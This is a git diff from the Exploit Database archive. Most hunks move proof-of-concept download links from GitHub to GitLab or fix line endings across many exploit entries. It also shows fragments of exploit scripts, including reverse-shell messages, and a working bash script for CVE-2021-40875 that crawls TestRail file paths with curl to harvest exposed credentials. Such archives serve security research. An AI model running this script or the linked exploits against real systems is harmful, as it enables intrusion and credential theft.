b/exploits/java/dos/46410.txt @@ -93,4 +93,4 @@ Attached with this report are three mutated testcases, and a simple Java program Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46410.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46410.zip \ No newline at end of file diff --git a/exploits/java/dos/46411.txt b/exploits/java/dos/46411.txt index 9b34805bd..8a3d87cc3 100644 --- a/exploits/java/dos/46411.txt +++ b/exploits/java/dos/46411.txt @@ -88,4 +88,4 @@ Attached with this report are three mutated testcases, and a simple Java program Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46411.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46411.zip \ No newline at end of file diff --git a/exploits/java/dos/46412.txt b/exploits/java/dos/46412.txt index 5e4484eda..7393d9adf 100644 --- a/exploits/java/dos/46412.txt +++ b/exploits/java/dos/46412.txt @@ -85,4 +85,4 @@ Attached with this report is the mutated testcase, and a simple Java program use Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46412.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46412.zip \ No newline at end of file diff --git a/exploits/java/remote/30502.txt b/exploits/java/remote/30502.txt index a2577a25f..79fdf5551 100644 --- a/exploits/java/remote/30502.txt +++ b/exploits/java/remote/30502.txt @@ -4,4 +4,4 @@ The Sun Java Runtime Environment is prone to a remote privilege-escalation vulne An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30502.tti \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30502.tti \ No newline at end of file diff --git a/exploits/java/remote/39007.txt b/exploits/java/remote/39007.txt index d05d6c1ad..0ca363be1 100644 --- a/exploits/java/remote/39007.txt +++ b/exploits/java/remote/39007.txt @@ -66,4 +66,4 @@ The Jasmin file we used is attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39007.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39007.zip \ No newline at end of file diff --git a/exploits/java/remote/39854.txt b/exploits/java/remote/39854.txt index 596682503..f23d26e64 100644 --- a/exploits/java/remote/39854.txt +++ b/exploits/java/remote/39854.txt @@ -55,7 +55,7 @@ Proof of concept: A simple PoC can be found here: https://github.com/h0ng10/powerfolder-exploit-poc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39854.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39854.zip Disclosure timeline: ---------------------------------------------------------------------- diff --git a/exploits/java/remote/42701.rb b/exploits/java/remote/42701.rb index 17d378c40..899e99486 100755 --- a/exploits/java/remote/42701.rb +++ b/exploits/java/remote/42701.rb @@ -75,4 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/exploits/java/remote/42702.rb b/exploits/java/remote/42702.rb index 14bb0a59f..4fe188c4d 100755 --- a/exploits/java/remote/42702.rb +++ b/exploits/java/remote/42702.rb @@ -75,4 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/exploits/java/remote/42756.py b/exploits/java/remote/42756.py index 731ee53d3..83365d5a5 100755 --- a/exploits/java/remote/42756.py +++ b/exploits/java/remote/42756.py @@ -101,4 +101,4 @@ if __name__ == "__main__": else: print "[-] Can't load ysoserial.jar" else: - printUsage() + printUsage() \ No newline at end of file diff --git a/exploits/java/webapps/40817.txt b/exploits/java/webapps/40817.txt index 3ff9a2b8c..a8ca03757 100644 --- a/exploits/java/webapps/40817.txt +++ b/exploits/java/webapps/40817.txt @@ -90,7 +90,7 @@ The vulnerability allows remote attackers to permanently embed arbitrary script 7. POC =========== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40817.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40817.zip 8. SOLUTION =========== diff --git a/exploits/java/webapps/40842.txt b/exploits/java/webapps/40842.txt index b0ba84686..83e3a5066 100644 --- a/exploits/java/webapps/40842.txt +++ b/exploits/java/webapps/40842.txt @@ -62,7 +62,7 @@ support and JBoss EAP 5 is close to the end of its maintenance period. See jboss_payload.zip (40842.zip) and Example Attack Session above. http://lab.mediaservice.net/code/jboss_payload.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40842.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40842.zip 6. Timeline @@ -74,4 +74,4 @@ Copyright (c) 2016 @ Mediaservice.net Srl. All rights reserved. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40842.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40842.zip \ No newline at end of file diff --git a/exploits/java/webapps/42543.txt b/exploits/java/webapps/42543.txt index cb310ec19..481170e8b 100644 --- a/exploits/java/webapps/42543.txt +++ b/exploits/java/webapps/42543.txt @@ -61,4 +61,4 @@ Host: TARGET GET http://TARGET/touch.txt HTTP/1.1 -peend +peend \ No newline at end of file diff --git a/exploits/java/webapps/42544.py b/exploits/java/webapps/42544.py index bd8ea4a6f..25f1d77a0 100755 --- a/exploits/java/webapps/42544.py +++ b/exploits/java/webapps/42544.py @@ -228,4 +228,4 @@ print '[+] Payload uploaded.' print '[+] Shell available at: http://'+host+'/'+filename[:-4] print -sys.exit() +sys.exit() \ No newline at end of file diff --git a/exploits/java/webapps/43114.py b/exploits/java/webapps/43114.py index 8dd236693..375d4a596 100755 --- a/exploits/java/webapps/43114.py +++ b/exploits/java/webapps/43114.py @@ -371,4 +371,4 @@ try: except RuntimeError as e: o('-', e) finally: - x.service_undeploy() + x.service_undeploy() \ No newline at end of file diff --git a/exploits/json/webapps/42579.txt b/exploits/json/webapps/42579.txt index 7e3295df7..58a7a4f39 100644 --- a/exploits/json/webapps/42579.txt +++ b/exploits/json/webapps/42579.txt @@ -56,5 +56,4 @@ Content-Type: application/x-xz Content-Disposition: form-data; name="BackupConfig[Upload][Description]" -------WebKitFormBoundary8FfEu2Tn6fUOnT80-- - +------WebKitFormBoundary8FfEu2Tn6fUOnT80-- \ No newline at end of file diff --git a/exploits/json/webapps/42580.html b/exploits/json/webapps/42580.html index 8b707fb52..41b44b170 100644 --- a/exploits/json/webapps/42580.html +++ b/exploits/json/webapps/42580.html @@ -55,4 +55,4 @@ HTML Decoded PoC: - + \ No newline at end of file diff --git a/exploits/jsp/remote/18179.html b/exploits/jsp/remote/18179.html index 9530339e4..e642c9f2e 100644 --- a/exploits/jsp/remote/18179.html +++ b/exploits/jsp/remote/18179.html @@ -65,8 +65,4 @@ height = "99%" - - - - - + \ No newline at end of file diff --git a/exploits/jsp/remote/42698.rb b/exploits/jsp/remote/42698.rb index eb976fc9e..4342626f4 100755 --- a/exploits/jsp/remote/42698.rb +++ b/exploits/jsp/remote/42698.rb @@ -111,4 +111,4 @@ class MetasploitModule < Msf::Auxiliary end end -end +end \ No newline at end of file diff --git a/exploits/jsp/webapps/15997.py b/exploits/jsp/webapps/15997.py index a4340612d..6367c6580 100755 --- a/exploits/jsp/webapps/15997.py +++ b/exploits/jsp/webapps/15997.py @@ -198,4 +198,4 @@ if __name__ == "__main__": interactiveAttack(myopener) elif options.csrf: writeCsrf() - addadmin = "" + addadmin = "" \ No newline at end of file diff --git a/exploits/jsp/webapps/17503.pl b/exploits/jsp/webapps/17503.pl index 27ccfc4b4..e80ddb5e0 100755 --- a/exploits/jsp/webapps/17503.pl +++ b/exploits/jsp/webapps/17503.pl @@ -430,7 +430,4 @@ $ret=$paths[$i]; return $ret; -} - - - +} \ No newline at end of file diff --git a/exploits/jsp/webapps/35910.txt b/exploits/jsp/webapps/35910.txt index 7cf57c69f..2fc595231 100644 --- a/exploits/jsp/webapps/35910.txt +++ b/exploits/jsp/webapps/35910.txt @@ -52,5 +52,4 @@ http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25 4. Script saved and gives an image msg with a javascript execution on image click. -5. Therefore, Persistent XSS. +5. Therefore, Persistent XSS. \ No newline at end of file diff --git a/exploits/multiple/webapps/49705.py b/exploits/multiple/webapps/49705.py index c2a3c8b23..62881c9d2 100755 --- a/exploits/multiple/webapps/49705.py +++ b/exploits/multiple/webapps/49705.py @@ -147,4 +147,4 @@ def main(): print("[+] Exploit finished!") print("[+] Enjoy your reverse shell!") if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/50320.sh b/exploits/multiple/webapps/50320.sh index 93d884881..3de3000fa 100755 --- a/exploits/multiple/webapps/50320.sh +++ b/exploits/multiple/webapps/50320.sh @@ -4,7 +4,7 @@ # Vendor Homepage: https://www.gurock.com/testrail/ # Version: 7.2.0.3014 and below # Tested on: macOS, Linux, Windows -# CVE : CVE-2021-40875 +# CVE : CVE-2021-40875 # Reference: https://johnjhacking.com/blog/cve-2021-40875/ CVE-2021-40875: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data. @@ -12,11 +12,11 @@ CVE-2021-40875: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 # Method 1 #!/bin/bash -# Author: sickcodes & johnjhacking -# Contact: https://twitter.com/sickcodes +# Author:       sickcodes & johnjhacking +# Contact:      https://twitter.com/sickcodes # https://github.com/SakuraSamuraii/derailed -# Copyright: sickcodes (C) 2021 -# License: GPLv3+ +# Copyright:    sickcodes (C) 2021 +# License:      GPLv3+ # stop null byte error while curling shopt -s nullglob @@ -25,7 +25,7 @@ shopt -s nullglob TARGET="${1}" -wget https://raw.githubusercontent.com/SakuraSamuraii/derailed/main/files.md5.txt +wget https://raw.githubusercontent.com/SakuraSamuraii/derailed/main/files.md5.txt FILE_LIST="${PWD}/files.md5.txt" @@ -38,62 +38,62 @@ touch ./accessible.log # curl "${TARGET}/files.md5" > ./files.md5 while read -r HASH SUFFIX; do - echo "${SUFFIX}" - TESTING_URL="${TARGET}/${SUFFIX}" - echo "========= ${TESTING_URL} =========" +    echo "${SUFFIX}" +    TESTING_URL="${TARGET}/${SUFFIX}" +    echo "========= ${TESTING_URL} =========" - # Ignore list, some of these files MAY be world readable, - # if the organisation has modified permissions related - # to the below files otherwise, they are ignored. - case "${SUFFIX}" in - *'.php' ) continue - ;; - *'.html' ) continue - ;; - *'LICENSE' ) continue - ;; - *'README.md' ) continue - ;; - *'.js' ) continue - ;; - *'.svg' ) continue - ;; - *'.gif' ) continue - ;; - *'.png' ) continue - ;; - *'.css' ) continue - ;; - *'.exe' ) continue - ;; - # *'.add_your_own' ) continue - # ;; - esac +    # Ignore list, some of these files MAY be world readable, +    # if the organisation has modified permissions related +    # to the below files otherwise, they are ignored. +    case "${SUFFIX}" in +        *'.php' ) continue +            ;; +        *'.html' ) continue +            ;; +        *'LICENSE' ) continue +            ;; +        *'README.md' ) continue +            ;; +        *'.js' ) continue +            ;; +        *'.svg' ) continue +            ;; +        *'.gif' ) continue +            ;; +        *'.png' ) continue +            ;; +        *'.css' ) continue +            ;; +        *'.exe' ) continue +            ;; +        # *'.add_your_own' ) continue +        #     ;; +    esac - # peek at page response - # doesn't work because gurock returns 200 and prints the error in plaintext - # curl -s -I -X POST "${TESTING_URL}" +    # peek at page response +    # doesn't work because gurock returns 200 and prints the error in plaintext +    # curl -s -I -X POST "${TESTING_URL}" - # feth the page, following redirects, to a variable - OUTPUT_DATA="$(curl -L -vvvv "${TESTING_URL}")" +    # feth the page, following redirects, to a variable +    OUTPUT_DATA="$(curl -L -vvvv "${TESTING_URL}")" - # find matching disqualifying pharses in the page contents - # and pass any pages that are "denied access" or "direct script access" - case "${OUTPUT_DATA}" in - *'No direct script'* ) continue - ;; - *'Directory Listing Denied'* ) continue - ;; - esac +    # find matching disqualifying pharses in the page contents +    # and pass any pages that are "denied access" or "direct script access" +    case "${OUTPUT_DATA}" in +        *'No direct script'* ) continue +            ;; +        *'Directory Listing Denied'* ) continue +            ;; +    esac - # save all interesting pages, without forward slashes - # https://www.target/ - # will be saved as: - # https:::www.target : - tee "${SUFFIX//\//\:}" <<< "${OUTPUT_DATA}" +    # save all interesting pages, without forward slashes +    # https://www.target/ +    # will be saved as: +    # https:::www.target : +    tee "${SUFFIX//\//\:}" <<< "${OUTPUT_DATA}" - # print to stdout, and also append to ./accessible.log the successful saves - tee -a ./accessible.log <<< "${TESTING_URL}" +    # print to stdout, and also append to ./accessible.log the successful saves +    tee -a ./accessible.log <<< "${TESTING_URL}" done < "${FILE_LIST}" diff --git a/exploits/netbsd_x86/remote/21364.txt b/exploits/netbsd_x86/remote/21364.txt index 7040ef0d1..5da5c4caf 100644 --- a/exploits/netbsd_x86/remote/21364.txt +++ b/exploits/netbsd_x86/remote/21364.txt @@ -8,4 +8,4 @@ This problem is exploitable remotely or locally and may aid an attacker in socia A malicious version of the NetBSD talkd component was used to exploit this issue, so it can be assumed that NetBSD is affected by this issue. However, talkd ships as a core component for a number of Linux and Unix variants and is independently maintained by the various distributions, so it is highly probable that many other operating systems are affected by this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21364.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21364.tar.gz \ No newline at end of file diff --git a/exploits/netware/remote/19364.txt b/exploits/netware/remote/19364.txt index fba5cf68d..ec5c96308 100644 --- a/exploits/netware/remote/19364.txt +++ b/exploits/netware/remote/19364.txt @@ -62,4 +62,4 @@ Now, the decrypted password is: The exploit program does all this automatically. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19364.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19364.zip \ No newline at end of file diff --git a/exploits/nodejs/webapps/43053.txt b/exploits/nodejs/webapps/43053.txt index e6ec6e32c..227696fb4 100644 --- a/exploits/nodejs/webapps/43053.txt +++ b/exploits/nodejs/webapps/43053.txt @@ -46,4 +46,4 @@ https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf -- Best Regards, Ishaq Mohammed -https://about.me/security-prince +https://about.me/security-prince \ No newline at end of file diff --git a/exploits/nodejs/webapps/43054.txt b/exploits/nodejs/webapps/43054.txt index 33bcb3138..f62ca76bd 100644 --- a/exploits/nodejs/webapps/43054.txt +++ b/exploits/nodejs/webapps/43054.txt @@ -42,5 +42,4 @@ https://github.com/keystonejs/keystone/pull/4478/commits/5cb6405dfc0b6d59003c996 Reference: https://github.com/keystonejs/keystone/pull/4478 -https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf - +https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf \ No newline at end of file diff --git a/exploits/novell/dos/14928.py b/exploits/novell/dos/14928.py index 965081064..e957a33cd 100755 --- a/exploits/novell/dos/14928.py +++ b/exploits/novell/dos/14928.py @@ -34,8 +34,4 @@ try: ftp.voidcmd('DELE ' + buffer) except Exception,err: - print err - - - - + print err \ No newline at end of file diff --git a/exploits/novell/dos/31710.txt b/exploits/novell/dos/31710.txt index 7a60361cf..23e58f480 100644 --- a/exploits/novell/dos/31710.txt +++ b/exploits/novell/dos/31710.txt @@ -8,4 +8,4 @@ By exploiting the denial-of-service vulnerability, attackers can crash the appli Novell GroupWise 7 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31710.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31710.zip \ No newline at end of file diff --git a/exploits/osx/dos/17567.txt b/exploits/osx/dos/17567.txt index 4a34f531b..7d867ef51 100644 --- a/exploits/osx/dos/17567.txt +++ b/exploits/osx/dos/17567.txt @@ -9,4 +9,4 @@ # Status : Patched */ -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17567.zip (CVE-2011-0222.zip) \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17567.zip (CVE-2011-0222.zip) \ No newline at end of file diff --git a/exploits/osx/dos/27714.txt b/exploits/osx/dos/27714.txt index e33204299..1459cc0fa 100644 --- a/exploits/osx/dos/27714.txt +++ b/exploits/osx/dos/27714.txt @@ -6,8 +6,8 @@ These issue affect Mac OS X and various applications including Safari, Preview, Apple Mac OS X 10.4.6 and prior are reported vulnerable to these issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27714-1.html +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27714-1.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27714-2.html +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27714-2.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27714-3.tiff \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27714-3.tiff \ No newline at end of file diff --git a/exploits/osx/dos/27715.txt b/exploits/osx/dos/27715.txt index b47ee73a3..f6d8a412c 100644 --- a/exploits/osx/dos/27715.txt +++ b/exploits/osx/dos/27715.txt @@ -6,4 +6,4 @@ These issue affect Mac OS X and various applications including Safari, Preview, Apple Mac OS X 10.4.6 and prior are reported vulnerable to these issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27715.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27715.zip \ No newline at end of file diff --git a/exploits/osx/dos/27790.txt b/exploits/osx/dos/27790.txt index 168756f94..6b7beb65a 100644 --- a/exploits/osx/dos/27790.txt +++ b/exploits/osx/dos/27790.txt @@ -4,4 +4,4 @@ ImageIO is susceptible to a remote denial-of-service vulnerability. This issue i This issue allows remote users to crash applications that use the ImageIO API, denying further service to users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27790.exr \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27790.exr \ No newline at end of file diff --git a/exploits/osx/dos/28521.txt b/exploits/osx/dos/28521.txt index b4d9ea9db..34ab13319 100644 --- a/exploits/osx/dos/28521.txt +++ b/exploits/osx/dos/28521.txt @@ -4,4 +4,4 @@ Apple QuickTime is prone to multiple vulnerabilities because it fails to properl An attacker can exploit these issues to execute arbitrary code in the context of the victim user running the vulnerable application. Successful exploits may facilitate a remote compromise of affected computers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28521.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28521.zip \ No newline at end of file diff --git a/exploits/osx/dos/29144.txt b/exploits/osx/dos/29144.txt index f0393ac0c..c12f40ba2 100644 --- a/exploits/osx/dos/29144.txt +++ b/exploits/osx/dos/29144.txt @@ -8,4 +8,4 @@ Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be Note: Further information from Alastair Houghton reports that this issue cannot be exploited to execute arbitrary code. See the references for details. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29144.dmg.bz2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29144.dmg.bz2 \ No newline at end of file diff --git a/exploits/osx/dos/29161.txt b/exploits/osx/dos/29161.txt index ade8da9cd..65426f818 100644 --- a/exploits/osx/dos/29161.txt +++ b/exploits/osx/dos/29161.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote users to crash affected compute Mac OS X 10.4.8 is vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29161.dmg.bz2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29161.dmg.bz2 \ No newline at end of file diff --git a/exploits/osx/dos/29441.txt b/exploits/osx/dos/29441.txt index f1982fa9f..0aa71d6a1 100644 --- a/exploits/osx/dos/29441.txt +++ b/exploits/osx/dos/29441.txt @@ -6,4 +6,4 @@ A successful exploit can allow a remote attacker to execute arbitrary code with Mac OS X 10.4.8 and freeBSD 6.1 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29441.dmg.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29441.dmg.gz \ No newline at end of file diff --git a/exploits/osx/dos/29452.txt b/exploits/osx/dos/29452.txt index 1d58e997d..8eb31eef4 100644 --- a/exploits/osx/dos/29452.txt +++ b/exploits/osx/dos/29452.txt @@ -6,4 +6,4 @@ A successful exploit can allow a remote attacker to cause kernel panic, resultin Mac OS X 10.4.8 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29452.dmg.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29452.dmg.gz \ No newline at end of file diff --git a/exploits/osx/dos/29454.txt b/exploits/osx/dos/29454.txt index 0891234e9..f1aa37a26 100644 --- a/exploits/osx/dos/29454.txt +++ b/exploits/osx/dos/29454.txt @@ -6,4 +6,4 @@ A successful exploit can allow an attacker to cause a kernel panic, resulting in Mac OS X 10.4.8 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29454.dmg.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29454.dmg.gz \ No newline at end of file diff --git a/exploits/osx/dos/29509.txt b/exploits/osx/dos/29509.txt index faa62e00c..949770c40 100644 --- a/exploits/osx/dos/29509.txt +++ b/exploits/osx/dos/29509.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to corrupt memory and Mac OS X 10.4.8 is vulnerable to this issue; other versions are also likely affected, since the vulnerable component has been included in Apple operating systems since System 6.0.4 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29509.pct \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29509.pct \ No newline at end of file diff --git a/exploits/osx/dos/29535.txt b/exploits/osx/dos/29535.txt index 68cca3dc4..d66fcb154 100644 --- a/exploits/osx/dos/29535.txt +++ b/exploits/osx/dos/29535.txt @@ -8,4 +8,4 @@ An attacker can exploit this issue to execute arbitrary code within the context Flip4Mac Windows Media Components for QuickTime version 2.1.0.33 is reported vulnerable; other versions may be affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29535.wmv \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29535.wmv \ No newline at end of file diff --git a/exploits/osx/dos/29620.txt b/exploits/osx/dos/29620.txt index 58b498e0f..fad0ec3b8 100644 --- a/exploits/osx/dos/29620.txt +++ b/exploits/osx/dos/29620.txt @@ -54,6 +54,6 @@ tommy[at]security-protocols[dot]com -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29620-1.gif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29620-1.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29620-2.gif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29620-2.gif \ No newline at end of file diff --git a/exploits/osx/dos/38264.txt b/exploits/osx/dos/38264.txt index e140bfb76..5ff10f0c7 100644 --- a/exploits/osx/dos/38264.txt +++ b/exploits/osx/dos/38264.txt @@ -62,4 +62,4 @@ Attack vector: This bug can be triggered by any application that uses the QuickLook framework to generate a preview/thumbnail of DAE (COLLADA) files. For example, loading the supplied POC in Preview or selecting the file in Finder and hitting will trigger the bug. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38264.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38264.zip \ No newline at end of file diff --git a/exploits/osx/dos/39357.txt b/exploits/osx/dos/39357.txt index 0a46e52c2..eb9b04886 100644 --- a/exploits/osx/dos/39357.txt +++ b/exploits/osx/dos/39357.txt @@ -46,4 +46,4 @@ vtable pointer. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39357.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39357.zip \ No newline at end of file diff --git a/exploits/osx/dos/39839.txt b/exploits/osx/dos/39839.txt index 3eb22bf1b..68fef548f 100644 --- a/exploits/osx/dos/39839.txt +++ b/exploits/osx/dos/39839.txt @@ -63,6 +63,6 @@ allocated buffer, which could allow for the execution of arbitrary code in the c =========== http://protekresearchlab.com/exploits/COSIG-2016-19.mov -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39839.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39839.zip ############################################################################### \ No newline at end of file diff --git a/exploits/osx/dos/44238.c b/exploits/osx/dos/44238.c index 1e71f3cd9..43497336f 100644 --- a/exploits/osx/dos/44238.c +++ b/exploits/osx/dos/44238.c @@ -10,7 +10,7 @@ * were changed from 64 bits to 32 bits, so the message structure will need to be updated * accordingly. This exploit has not been tested on iOS. * - * Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44238.zip + * Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44238.zip */ #include diff --git a/exploits/osx/local/19437.txt b/exploits/osx/local/19437.txt index 3972f2c30..a4e783b10 100644 --- a/exploits/osx/local/19437.txt +++ b/exploits/osx/local/19437.txt @@ -8,4 +8,4 @@ There are two problems: This program, written by mSec, will decrypt the administrator password for Screen to Screen. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19437.sit \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19437.sit \ No newline at end of file diff --git a/exploits/osx/local/19438.txt b/exploits/osx/local/19438.txt index 79c4b5fcc..ea20e9462 100644 --- a/exploits/osx/local/19438.txt +++ b/exploits/osx/local/19438.txt @@ -4,4 +4,4 @@ Autothenticate is an extension for MacOS that remembers usernames and passwords This program, written by mSec, decrypts the Autothenticate information. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19438.sit \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19438.sit \ No newline at end of file diff --git a/exploits/osx/local/19439.txt b/exploits/osx/local/19439.txt index 33f91503e..326a9ca64 100644 --- a/exploits/osx/local/19439.txt +++ b/exploits/osx/local/19439.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/553/info On Guard, a security program for MacOS, includes an emergency password feature in the event that the administrative password is lost or forgotten. If the user name 'emergency' is entered, On Guard will generate an Emergency Code. The user must then call Power On Software, and after registration validation is done, provide the Emergency Code. Power On Software will then provide an emergency password. However, the method used to generate this emergency password has been reverse engineered, and an exploit is publicly available that will automatically generate the emergency password with no phone call. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19439.sit \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19439.sit \ No newline at end of file diff --git a/exploits/osx/local/21070.txt b/exploits/osx/local/21070.txt index d56f3d6c2..c63231f03 100644 --- a/exploits/osx/local/21070.txt +++ b/exploits/osx/local/21070.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/3186/info A user who has set an Open Firmware password on their Apple system believes it to be safe when powered down. There is a tool that any user with access to the Finder can run in order to reveal the Open Firmware password without any decryption. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21070.sit \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21070.sit \ No newline at end of file diff --git a/exploits/osx/local/21076.txt b/exploits/osx/local/21076.txt index 314183ce9..6308dddac 100644 --- a/exploits/osx/local/21076.txt +++ b/exploits/osx/local/21076.txt @@ -6,4 +6,4 @@ Intego FileGuard provides system level access restrictions to versions of Mac OS mSec has released a tool called Disengage which will attempt to decrypt passwords, provided circumstances exist which allow Disengage to work. Passwords for Intego DiskGuard may also be decrypted in this manner. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21076.sit \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21076.sit \ No newline at end of file diff --git a/exploits/osx/local/29190.txt b/exploits/osx/local/29190.txt index 2cd5ac07a..a8bc10049 100644 --- a/exploits/osx/local/29190.txt +++ b/exploits/osx/local/29190.txt @@ -4,4 +4,4 @@ Apple Mac OS X is prone to a local integer-overflow vulnerability. This issue oc A successful exploit would allow a local attacker to execute arbitrary code with kernel-level privileges, 